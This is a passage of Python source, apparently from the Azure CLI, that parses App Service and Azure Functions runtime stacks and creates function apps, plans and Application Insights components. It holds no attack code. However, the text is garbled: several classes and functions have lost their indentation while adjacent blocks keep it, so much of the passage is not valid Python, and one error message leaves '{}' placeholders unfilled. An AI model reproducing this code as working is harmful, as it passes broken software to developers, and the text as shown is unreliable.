if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
# pylint: disable=too-few-public-methods
class _AbstractStackRuntimeHelper:
def __init__(self, cmd, linux=False, windows=False):
self._cmd = cmd
self._client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
self._linux = linux
self._windows = windows
self._stacks = []
@property
def stacks(self):
self._load_stacks()
return self._stacks
def _get_raw_stacks_from_api(self):
raise NotImplementedError
# updates self._stacks
def _parse_raw_stacks(self, stacks):
raise NotImplementedError
def _load_stacks(self):
if self._stacks:
return
stacks = self._get_raw_stacks_from_api()
self._parse_raw_stacks(stacks)
# WebApps stack class
class _StackRuntimeHelper(_AbstractStackRuntimeHelper):
    """Helper for WebApp runtime stacks (display names like 'node|14lts', 'php|7.4').

    Fetches Windows/Linux web-app stacks from the provider API, normalizes their
    display names, and exposes lookup/config helpers used when creating or
    configuring webapps.
    """

    # pylint: disable=too-few-public-methods
    class Runtime:
        """One parsed runtime: display name plus the site-config values it implies."""
        def __init__(self, display_name=None, configs=None, github_actions_properties=None, linux=False):
            self.display_name = display_name
            self.configs = configs if configs is not None else dict()
            self.github_actions_properties = github_actions_properties
            self.linux = linux

    def __init__(self, cmd, linux=False, windows=False):
        # TODO try and get API support for this so it isn't hardcoded
        self.windows_config_mappings = {
            'node': 'WEBSITE_NODE_DEFAULT_VERSION',
            'python': 'python_version',
            'php': 'php_version',
            'aspnet': 'net_framework_version',
            'dotnet': 'net_framework_version',
            'dotnetcore': None
        }
        self.default_delimeter = "|"  # character that separates runtime name from version
        self.allowed_delimeters = "|:"  # delimiters allowed: '|', ':'
        super().__init__(cmd, linux=linux, windows=windows)

    def get_stack_names_only(self, delimiter=None):
        """Return stack display names (optionally re-delimited), keyed by OS if both OSes were requested."""
        windows_stacks = [s.display_name for s in self.stacks if not s.linux]
        linux_stacks = [s.display_name for s in self.stacks if s.linux]
        if delimiter is not None:
            windows_stacks = [n.replace(self.default_delimeter, delimiter) for n in windows_stacks]
            linux_stacks = [n.replace(self.default_delimeter, delimiter) for n in linux_stacks]
        if self._linux and not self._windows:
            return linux_stacks
        if self._windows and not self._linux:
            return windows_stacks
        return {LINUX_OS_NAME: linux_stacks, WINDOWS_OS_NAME: windows_stacks}

    def _get_raw_stacks_from_api(self):
        return list(self._client.provider.get_web_app_stacks(stack_os_type=None))

    # updates self._stacks
    def _parse_raw_stacks(self, stacks):
        for lang in stacks:
            if lang.display_text.lower() == "java":
                continue  # info on java stacks is taken from the "java containers" stacks
            for major_version in lang.major_versions:
                if self._linux:
                    self._parse_major_version_linux(major_version, self._stacks)
                if self._windows:
                    self._parse_major_version_windows(major_version, self._stacks, self.windows_config_mappings)

    def remove_delimiters(self, runtime):
        """Normalize any allowed delimiter ('|' or ':') in *runtime* to the default '|'."""
        import re
        runtime = re.split("[{}]".format(self.allowed_delimeters), runtime)
        return self.default_delimeter.join(filter(None, runtime))

    def resolve(self, display_name, linux=False):
        """Return the Runtime matching *display_name* (case-insensitive), mapping legacy names; None if not found."""
        display_name = display_name.lower()
        stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
        if stack is None:  # help convert previously acceptable stack names into correct ones if runtime not found
            old_to_new_windows = {
                "node|12-lts": "node|12lts",
                "node|14-lts": "node|14lts",
                "node|16-lts": "node|16lts",
                "dotnet|5.0": "dotnet|5",
                "dotnet|6.0": "dotnet|6",
            }
            old_to_new_linux = {
                "dotnet|5.0": "dotnetcore|5.0",
                "dotnet|6.0": "dotnetcore|6.0",
            }
            if linux:
                display_name = old_to_new_linux.get(display_name)
            else:
                display_name = old_to_new_windows.get(display_name)
            stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
        return stack

    @classmethod
    def get_site_config_setter(cls, runtime, linux=False):
        """Return the function that applies *runtime*'s configs to a site config object."""
        if linux:
            return cls.update_site_config
        # Windows node version is configured via an app setting rather than site config.
        return cls.update_site_appsettings if 'node' in runtime.display_name.lower() else cls.update_site_config

    # assumes non-java
    def get_default_version(self, lang, linux=False, get_windows_config_version=False):
        """Return the first version (ascending sort) available for *lang* on the given OS."""
        versions = self.get_version_list(lang, linux, get_windows_config_version)
        versions.sort()
        if not versions:
            os = WINDOWS_OS_NAME if not linux else LINUX_OS_NAME
            raise ValidationError("Invalid language type {} for OS {}".format(lang, os))
        return versions[0]

    # assumes non-java
    def get_version_list(self, lang, linux=False, get_windows_config_version=False):
        """List available versions for *lang* on the given OS (optionally the Windows config value)."""
        lang = lang.upper()
        versions = []
        for s in self.stacks:
            if s.linux == linux:
                l_name, v, *_ = s.display_name.upper().split("|")
                if l_name == lang:
                    if get_windows_config_version:
                        versions.append(s.configs[self.windows_config_mappings[lang.lower()]])
                    else:
                        versions.append(v)
        return versions

    @staticmethod
    def update_site_config(stack, site_config, cmd=None):
        """Copy each of the stack's config key/values onto *site_config* attributes."""
        for k, v in stack.configs.items():
            setattr(site_config, k, v)
        return site_config

    @staticmethod
    def update_site_appsettings(cmd, stack, site_config):
        """Merge the stack's configs into *site_config.app_settings* (update-or-append by name)."""
        NameValuePair = cmd.get_models('NameValuePair')
        if site_config.app_settings is None:
            site_config.app_settings = []
        for k, v in stack.configs.items():
            already_in_appsettings = False
            for app_setting in site_config.app_settings:
                if app_setting.name == k:
                    already_in_appsettings = True
                    app_setting.value = v
            if not already_in_appsettings:
                site_config.app_settings.append(NameValuePair(name=k, value=v))
        return site_config

    # format a (non-java) windows runtime display text
    # TODO get API to return more CLI-friendly display text for windows stacks
    @classmethod
    def _format_windows_display_text(cls, display_text):
        import re
        t = display_text.upper()
        t = t.replace(".NET CORE", NETCORE_RUNTIME_NAME.upper())
        t = t.replace("ASP.NET", ASPDOTNET_RUNTIME_NAME.upper())
        t = t.replace(".NET", DOTNET_RUNTIME_NAME)
        t = re.sub(r"\(.*\)", "", t)  # remove "(LTS)"
        return t.replace(" ", "|", 1).replace(" ", "")

    @classmethod
    def _is_valid_runtime_setting(cls, runtime_setting):
        # Hidden or deprecated stacks are not offered to users.
        return runtime_setting is not None and not runtime_setting.is_hidden and not runtime_setting.is_deprecated

    @classmethod
    def _get_runtime_setting(cls, minor_version, linux, java):
        """Pick the runtime/container settings object for the given OS/java combination."""
        if not linux:
            if not java:
                return minor_version.stack_settings.windows_runtime_settings
            return minor_version.stack_settings.windows_container_settings
        if not java:
            return minor_version.stack_settings.linux_runtime_settings
        return minor_version.stack_settings.linux_container_settings

    @classmethod
    def _get_valid_minor_versions(cls, major_version, linux, java=False):
        def _filter(minor_version):
            return cls._is_valid_runtime_setting(cls._get_runtime_setting(minor_version, linux, java))
        return [m for m in major_version.minor_versions if _filter(m)]

    def _parse_major_version_windows(self, major_version, parsed_results, config_mappings):
        """Append Runtime entries for one Windows major version (java handled specially)."""
        minor_java_versions = self._get_valid_minor_versions(major_version, linux=False, java=True)
        default_java_version = next(iter(minor_java_versions), None)
        if default_java_version:
            container_settings = default_java_version.stack_settings.windows_container_settings
            # TODO get the API to return java versions in a more parseable way
            for java_version in ["1.8", "11"]:
                java_container = container_settings.java_container
                container_version = container_settings.java_container_version
                if container_version.upper() == "SE":
                    java_container = "Java SE"
                    if java_version == "1.8":
                        container_version = "8"
                    else:
                        container_version = "11"
                runtime_name = "{}|{}|{}|{}".format("java",
                                                    java_version,
                                                    java_container,
                                                    container_version)
                gh_actions_version = "8" if java_version == "1.8" else java_version
                gh_actions_runtime = "{}, {}, {}".format(java_version,
                                                         java_container.lower().replace(" se", ""),
                                                         container_settings.java_container_version.lower())
                if java_container == "Java SE":  # once runtime name is set, reset configs to correct values
                    java_container = "JAVA"
                    container_version = "SE"
                runtime = self.Runtime(display_name=runtime_name,
                                       configs={"java_version": java_version,
                                                "java_container": java_container,
                                                "java_container_version": container_version},
                                       github_actions_properties={"github_actions_version": gh_actions_version,
                                                                  "app_runtime": "java",
                                                                  "app_runtime_version": gh_actions_runtime},
                                       linux=False)
                parsed_results.append(runtime)
        else:
            minor_versions = self._get_valid_minor_versions(major_version, linux=False, java=False)
            for minor_version in minor_versions:
                settings = minor_version.stack_settings.windows_runtime_settings
                runtime_name = self._format_windows_display_text(minor_version.display_text)
                runtime = self.Runtime(display_name=runtime_name, linux=False)
                lang_name = runtime_name.split("|")[0].lower()
                config_key = config_mappings.get(lang_name)
                if config_key:
                    runtime.configs[config_key] = settings.runtime_version
                gh_properties = settings.git_hub_action_settings
                if gh_properties.is_supported:
                    runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
                parsed_results.append(runtime)

    def _parse_major_version_linux(self, major_version, parsed_results):
        """Append Runtime entries for one Linux major version (java handled specially)."""
        minor_java_versions = self._get_valid_minor_versions(major_version, linux=True, java=True)
        default_java_version_linux = next(iter(minor_java_versions), None)
        if default_java_version_linux:
            linux_container_settings = default_java_version_linux.stack_settings.linux_container_settings
            runtimes = [(linux_container_settings.java11_runtime, "11"), (linux_container_settings.java8_runtime, "8")]
            for runtime_name, version in [(r, v) for (r, v) in runtimes if r is not None]:
                runtime = self.Runtime(display_name=runtime_name,
                                       configs={"linux_fx_version": runtime_name},
                                       github_actions_properties={"github_actions_version": version},
                                       linux=True,
                                       )
                parsed_results.append(runtime)
        else:
            minor_versions = self._get_valid_minor_versions(major_version, linux=True, java=False)
            for minor_version in minor_versions:
                settings = minor_version.stack_settings.linux_runtime_settings
                runtime_name = settings.runtime_version
                runtime = self.Runtime(display_name=runtime_name,
                                       configs={"linux_fx_version": runtime_name},
                                       linux=True,
                                       )
                gh_properties = settings.git_hub_action_settings
                if gh_properties.is_supported:
                    runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
                parsed_results.append(runtime)

    # override _load_stacks() to call this method to use hardcoded stacks
    def _load_stacks_hardcoded(self):
        """Populate self._stacks from the bundled WebappRuntimeStacks.json instead of the API."""
        import os
        stacks_file = os.path.abspath(os.path.join(os.path.abspath(__file__), '../resources/WebappRuntimeStacks.json'))
        if self._stacks:
            return
        stacks = []
        if self._linux:
            stacks_json = get_file_json(stacks_file)['linux']
            for r in stacks_json:
                stacks.append(self.Runtime(display_name=r.get("displayName"),
                                           configs=r.get("configs"),
                                           github_actions_properties=r.get("github_actions_properties"),
                                           linux=True))
        if self._windows:  # Windows stacks
            stacks_json = get_file_json(stacks_file)['windows']
            for r in stacks_json:
                stacks.append(self.Runtime(display_name=r.get("displayName"),
                                           configs=r.get("configs"),
                                           github_actions_properties=r.get("github_actions_properties"),
                                           linux=False))
        self._stacks = stacks
class _FunctionAppStackRuntimeHelper(_AbstractStackRuntimeHelper):
# pylint: disable=too-few-public-methods,too-many-instance-attributes
class Runtime:
def __init__(self, name=None, version=None, is_preview=False, supported_func_versions=None, linux=False,
app_settings_dict=None, site_config_dict=None, app_insights=False, default=False):
self.name = name
self.version = version
self.is_preview = is_preview
self.supported_func_versions = [] if not supported_func_versions else supported_func_versions
self.linux = linux
self.app_settings_dict = dict() if not app_settings_dict else app_settings_dict
self.site_config_dict = dict() if not site_config_dict else site_config_dict
self.app_insights = app_insights
self.default = default
self.display_name = "{}|{}".format(name, version) if version else name
# used for displaying stacks
def to_dict(self):
return {"runtime": self.name,
"version": self.version,
"supported_functions_versions": self.supported_func_versions}
def __init__(self, cmd, linux=False, windows=False):
self.disallowed_functions_versions = {"~1", "~2"}
self.KEYS = FUNCTIONS_STACKS_API_KEYS()
super().__init__(cmd, linux=linux, windows=windows)
def resolve(self, runtime, version=None, functions_version=None, linux=False):
stacks = self.stacks
runtimes = [r for r in stacks if r.linux == linux and runtime == r.name]
os = LINUX_OS_NAME if linux else WINDOWS_OS_NAME
if not runtimes:
supported_runtimes = [r.name for r in stacks if r.linux == linux]
raise ValidationError("Runtime {0} not supported for os {1}. Supported runtimes for os {1} are: {2}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(runtime, os, supported_runtimes))
if version is None:
return self.get_default_version(runtime, functions_version, linux)
matched_runtime_version = next((r for r in runtimes if r.version == version), None)
if not matched_runtime_version:
# help convert previously acceptable versions into correct ones if match not found
old_to_new_version = {
"11": "11.0",
"8": "8.0"
}
new_version = old_to_new_version.get(version)
matched_runtime_version = next((r for r in runtimes if r.version == new_version), None)
if not matched_runtime_version:
versions = [r.version for r in runtimes]
raise ValidationError("Invalid version: {0} for runtime {1} and os {2}. Supported versions for runtime "
"{1} and os {2} are: {3}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(version, runtime, os, versions))
if functions_version not in matched_runtime_version.supported_func_versions:
supported_func_versions = matched_runtime_version.supported_func_versions
raise ValidationError("Functions version {} is not supported for runtime {} with version {} and os {}. "
"Supported functions versions are {}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(functions_version, runtime, version, os, supported_func_versions))
return matched_runtime_version
def get_default_version(self, runtime, functions_version, linux=False):
runtimes = [r for r in self.stacks if r.linux == linux and r.name == runtime]
runtimes.sort(key=lambda r: r.default, reverse=True) # make runtimes with default=True appear first
for r in runtimes:
if functions_version in r.supported_func_versions:
return r
raise ValidationError("Could not find a runtime version for runtime {} with functions version {} and os {}"
"Run 'az functionapp list-runtimes' for more details on supported runtimes. ")
def _get_raw_stacks_from_api(self):
return list(self._client.provider.get_function_app_stacks(stack_os_type=None))
# remove non-digit or non-"." chars
@classmethod
def _format_version_name(cls, name):
import re
return re.sub(r"[^\d\.]", "", name)
# format version names while maintaining uniqueness
def _format_version_names(self, runtime_to_version):
formatted_runtime_to_version = {}
for runtime, versions in runtime_to_version.items():
formatted_runtime_to_version[runtime] = formatted_runtime_to_version.get(runtime, dict())
for version_name, version_info in versions.items():
formatted_name = self._format_version_name(version_name)
if formatted_name in formatted_runtime_to_version[runtime]:
formatted_name = version_name.lower().replace(" ", "-")
formatted_runtime_to_version[runtime][formatted_name] = version_info
return formatted_runtime_to_version
@classmethod
def _format_function_version(cls, v):
return v.replace("~", "")
def _get_valid_function_versions(self, runtime_settings):
supported_function_versions = runtime_settings.supported_functions_extension_versions
valid_versions = []
for v in supported_function_versions:
if v not in self.disallowed_functions_versions:
valid_versions.append(self._format_version_name(v))
return valid_versions
def _parse_minor_version(self, runtime_settings, major_version_name, minor_version_name, runtime_to_version):
if not runtime_settings.is_deprecated:
functions_versions = self._get_valid_function_versions(runtime_settings)
if functions_versions:
runtime_version_properties = {
self.KEYS.IS_PREVIEW: runtime_settings.is_preview,
self.KEYS.SUPPORTED_EXTENSION_VERSIONS: functions_versions,
self.KEYS.APP_SETTINGS_DICT: runtime_settings.app_settings_dictionary,
self.KEYS.APPLICATION_INSIGHTS: runtime_settings.app_insights_settings.is_supported,
self.KEYS.SITE_CONFIG_DICT: runtime_settings.site_config_properties_dictionary,
self.KEYS.IS_DEFAULT: bool(runtime_settings.is_default),
}
runtime_name = (runtime_settings.app_settings_dictionary.get(self.KEYS.FUNCTIONS_WORKER_RUNTIME) or
major_version_name)
runtime_to_version[runtime_name] = runtime_to_version.get(runtime_name, dict())
runtime_to_version[runtime_name][minor_version_name] = runtime_version_properties
def _create_runtime_from_properties(self, runtime_name, version_name, version_properties, linux):
supported_func_versions = version_properties[self.KEYS.SUPPORTED_EXTENSION_VERSIONS]
return self.Runtime(name=runtime_name,
version=version_name,
is_preview=version_properties[self.KEYS.IS_PREVIEW],
supported_func_versions=supported_func_versions,
linux=linux,
site_config_dict=version_properties[self.KEYS.SITE_CONFIG_DICT],
app_settings_dict=version_properties[self.KEYS.APP_SETTINGS_DICT],
app_insights=version_properties[self.KEYS.APPLICATION_INSIGHTS],
default=version_properties[self.KEYS.IS_DEFAULT],
)
def _parse_raw_stacks(self, stacks):
# build a map of runtime -> runtime version -> runtime version properties
runtime_to_version_linux = {}
runtime_to_version_windows = {}
for runtime in stacks:
for major_version in runtime.major_versions:
for minor_version in major_version.minor_versions:
runtime_version = minor_version.value
linux_settings = minor_version.stack_settings.linux_runtime_settings
windows_settings = minor_version.stack_settings.windows_runtime_settings
if linux_settings is not None:
self._parse_minor_version(runtime_settings=linux_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_linux)
if windows_settings is not None:
self._parse_minor_version(runtime_settings=windows_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_windows)
runtime_to_version_linux = self._format_version_names(runtime_to_version_linux)
runtime_to_version_windows = self._format_version_names(runtime_to_version_windows)
for runtime_name, versions in runtime_to_version_windows.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=False)
self._stacks.append(r)
for runtime_name, versions in runtime_to_version_linux.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=True)
self._stacks.append(r)
def get_app_insights_key(cli_ctx, resource_group, name):
    """Return the instrumentation key of an Application Insights component."""
    appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    component = appinsights_client.components.get(resource_group, name)
    # Treat a missing component or a component without a key the same way.
    if component is None or component.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
    return component.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
                                        max_burst=None, location=None, tags=None, zone_redundant=False):
    """Create (or update) an App Service plan suitable for hosting a function app."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    normalized_sku = _normalize_sku(sku)
    tier = get_sku_tier(normalized_sku)
    client = web_client_factory(cmd.cli_ctx)
    # Default the plan's location to the resource group's location.
    plan_location = location
    if plan_location is None:
        plan_location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    sku_def = SkuDescription(tier=tier, name=normalized_sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=plan_location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
                              hyper_v=None, name=name)
    if zone_redundant:
        _enable_zone_redundant(plan_def, sku_def, number_of_workers)
    return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
    """Return True when *plan_info* is an App Service plan on the consumption ('Dynamic') tier."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan) and isinstance(plan_info.sku, SkuDescription):
        return plan_info.sku.tier.lower() == 'dynamic'
    return False
def is_plan_elastic_premium(cmd, plan_info):
    """Return True when *plan_info* is an App Service plan on the ElasticPremium tier.

    Uses a case-insensitive comparison for consistency with is_plan_consumption
    (the original compared case-sensitively against 'ElasticPremium' only).
    """
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if isinstance(plan_info.sku, SkuDescription):
            return plan_info.sku.tier.lower() == 'elasticpremium'
    return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
                       os_type=None, functions_version=None, runtime=None, runtime_version=None,
                       consumption_plan_location=None, app_insights=None, app_insights_key=None,
                       disable_app_insights=None, deployment_source_url=None,
                       deployment_source_branch='master', deployment_local_git=None,
                       docker_registry_server_password=None, docker_registry_server_user=None,
                       deployment_container_image_name=None, tags=None, assign_identities=None,
                       role='Contributor', scope=None, vnet=None, subnet=None):
    """Create an Azure Function App (``az functionapp create``).

    Exactly one of ``plan`` (dedicated/elastic plan name or resource id) and
    ``consumption_plan_location`` must be given. The storage account is
    validated and its connection string is wired into the app settings.
    Optionally configures VNet integration, Application Insights, git
    deployment, a custom container image, and managed identities.

    Returns the created Site object (with ``identity`` attached when
    ``assign_identities`` was requested).
    Raises MutuallyExclusiveArgumentError / ArgumentUsageError /
    ValidationError / CLIError on invalid argument combinations.
    """
    # pylint: disable=too-many-statements, too-many-branches
    if functions_version is None:
        logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
                       "be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
        functions_version = '3'
    if deployment_source_url and deployment_local_git:
        raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
    # exactly one of --plan / --consumption-plan-location must be provided
    if bool(plan) == bool(consumption_plan_location):
        raise MutuallyExclusiveArgumentError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    from azure.mgmt.web.models import Site
    SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    # normalize the tri-state CLI string to a real boolean
    disable_app_insights = (disable_app_insights == "true")
    site_config = SiteConfig(app_settings=[])
    client = web_client_factory(cmd.cli_ctx)
    if vnet or subnet:
        # VNet integration: resolve the app's target location first so the
        # subnet location can be validated against it.
        if plan:
            if is_valid_resource_id(plan):
                parse_result = parse_resource_id(plan)
                plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
            else:
                plan_info = client.app_service_plans.get(resource_group_name, plan)
            webapp_location = plan_info.location
        else:
            webapp_location = consumption_plan_location
        subnet_info = _get_subnet_info(cmd=cmd,
                                       resource_group_name=resource_group_name,
                                       subnet=subnet,
                                       vnet=vnet)
        _validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
                                            subnet_resource_group=subnet_info["resource_group_name"],
                                            vnet_name=subnet_info["vnet_name"],
                                            vnet_sub_id=subnet_info["subnet_subscription_id"])
        _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
                               vnet_resource_group=subnet_info["resource_group_name"],
                               vnet_name=subnet_info["vnet_name"],
                               subnet_name=subnet_info["subnet_name"])
        site_config.vnet_route_all_enabled = True
        subnet_resource_id = subnet_info["subnet_resource_id"]
    else:
        subnet_resource_id = None
    # location is filled in below once the plan/consumption branch is resolved
    functionapp_def = Site(location=None, site_config=site_config, tags=tags,
                           virtual_network_subnet_id=subnet_resource_id)
    plan_info = None
    if runtime is not None:
        runtime = runtime.lower()
    if consumption_plan_location:
        locations = list_consumption_locations(cmd)
        location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise ValidationError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
        # if os_type is None, the os type is windows
        is_linux = bool(os_type and os_type.lower() == LINUX_OS_NAME)
    else:  # apps with SKU based plan
        if is_valid_resource_id(plan):
            parse_result = parse_resource_id(plan)
            plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
        else:
            plan_info = client.app_service_plans.get(resource_group_name, plan)
        if not plan_info:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        location = plan_info.location
        # on a dedicated plan the OS comes from the plan, not --os-type
        is_linux = bool(plan_info.reserved)
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
        raise ValidationError("2.x functions are not supported in this region. To create a 3.x function, "
                              "pass in the flag '--functions-version 3'")
    if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise ArgumentUsageError(
            "usage error: --runtime RUNTIME required for linux functions apps without custom image.")
    if runtime is None and runtime_version is not None:
        raise ArgumentUsageError('Must specify --runtime to use --runtime-version')
    # resolve the runtime stack; windows apps default to the dotnet stack
    runtime_helper = _FunctionAppStackRuntimeHelper(cmd, linux=is_linux, windows=(not is_linux))
    matched_runtime = runtime_helper.resolve("dotnet" if not runtime else runtime,
                                             runtime_version, functions_version, is_linux)
    site_config_dict = matched_runtime.site_config_dict
    app_settings_dict = matched_runtime.app_settings_dict
    con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
    if is_linux:
        functionapp_def.kind = 'functionapp,linux'
        functionapp_def.reserved = True
        is_consumption = consumption_plan_location is not None
        if not is_consumption:
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                functionapp_def.kind = 'functionapp,linux,container'
                site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
                                                              value=deployment_container_image_name))
                site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='false'))
                site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
                # clear all runtime specific configs and settings
                site_config_dict.use32_bit_worker_process = False
                app_settings_dict = {}
                # ensure that app insights is created if not disabled
                matched_runtime.app_insights = True
            else:
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='true'))
    else:
        functionapp_def.kind = 'functionapp'
    # set site configs
    for prop, value in site_config_dict.as_dict().items():
        snake_case_prop = _convert_camel_to_snake_case(prop)
        setattr(site_config, snake_case_prop, value)
    # temporary workaround for dotnet-isolated linux consumption apps
    if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
        site_config.linux_fx_version = ''
    # adding app settings
    for app_setting, value in app_settings_dict.items():
        site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
    site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
                                                  value=_get_extension_version_functionapp(functions_version)))
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
    # If plan is not consumption or elastic premium, we need to set always on
    if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
        site_config.always_on = True
    # If plan is elastic premium or consumption, we need these app settings
    if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      value=con_string))
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
    # Application Insights: explicit key > named resource > disabled/unsupported
    # (dashboard fallback) > auto-create after the app exists.
    create_app_insights = False
    if app_insights_key is not None:
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=app_insights_key))
    elif app_insights is not None:
        instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=instrumentation_key))
    elif disable_app_insights or not matched_runtime.app_insights:
        # set up dashboard if no app insights
        site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
    elif not disable_app_insights and matched_runtime.app_insights:
        create_app_insights = True
    poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
                       "created but is not active until content is published using "
                       "Azure Portal or the Functions Core Tools.", name)
    else:
        _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
                                 deployment_source_branch, deployment_local_git)
    if create_app_insights:
        try:
            try_create_application_insights(cmd, functionapp)
        except Exception:  # pylint: disable=broad-except
            # best-effort: fall back to the dashboard setting when AI creation fails
            logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
                           'Please use the Azure Portal to create and configure the Application Insights, if needed.')
            update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                                ['AzureWebJobsDashboard={}'.format(con_string)])
    if deployment_container_image_name:
        update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
                                              deployment_container_image_name, docker_registry_server_user,
                                              docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        functionapp.identity = identity
    return functionapp
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
    """Parse a functions runtime version string into a float.

    Tries the Windows runtime-version pattern first, then the Linux one, then
    a plain float parse; returns 0 when nothing matches. (is_linux is kept
    for signature compatibility; both patterns are always tried.)
    """
    import re
    for pattern in (FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
                    FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX):
        matched = re.fullmatch(pattern, version_string)
        if matched:
            return float(matched.group(1))
    try:
        return float(version_string)
    except ValueError:
        return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
    """Create an Application Insights component next to the function app and wire up its key.

    The component is created in the app's resource group/location under the
    app's own name; on success APPINSIGHTS_INSTRUMENTATIONKEY is written to
    the app settings. Failures are reported via warnings, not exceptions.
    """
    creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
                           'Please use the Azure Portal to manually create and configure the Application Insights, ' \
                           'if needed.'
    ai_resource_group_name = functionapp.resource_group
    ai_name = functionapp.name
    ai_location = functionapp.location
    app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
    ai_properties = {
        "name": ai_name,
        "location": ai_location,
        "kind": "web",
        "properties": {
            "Application_Type": "web"
        }
    }
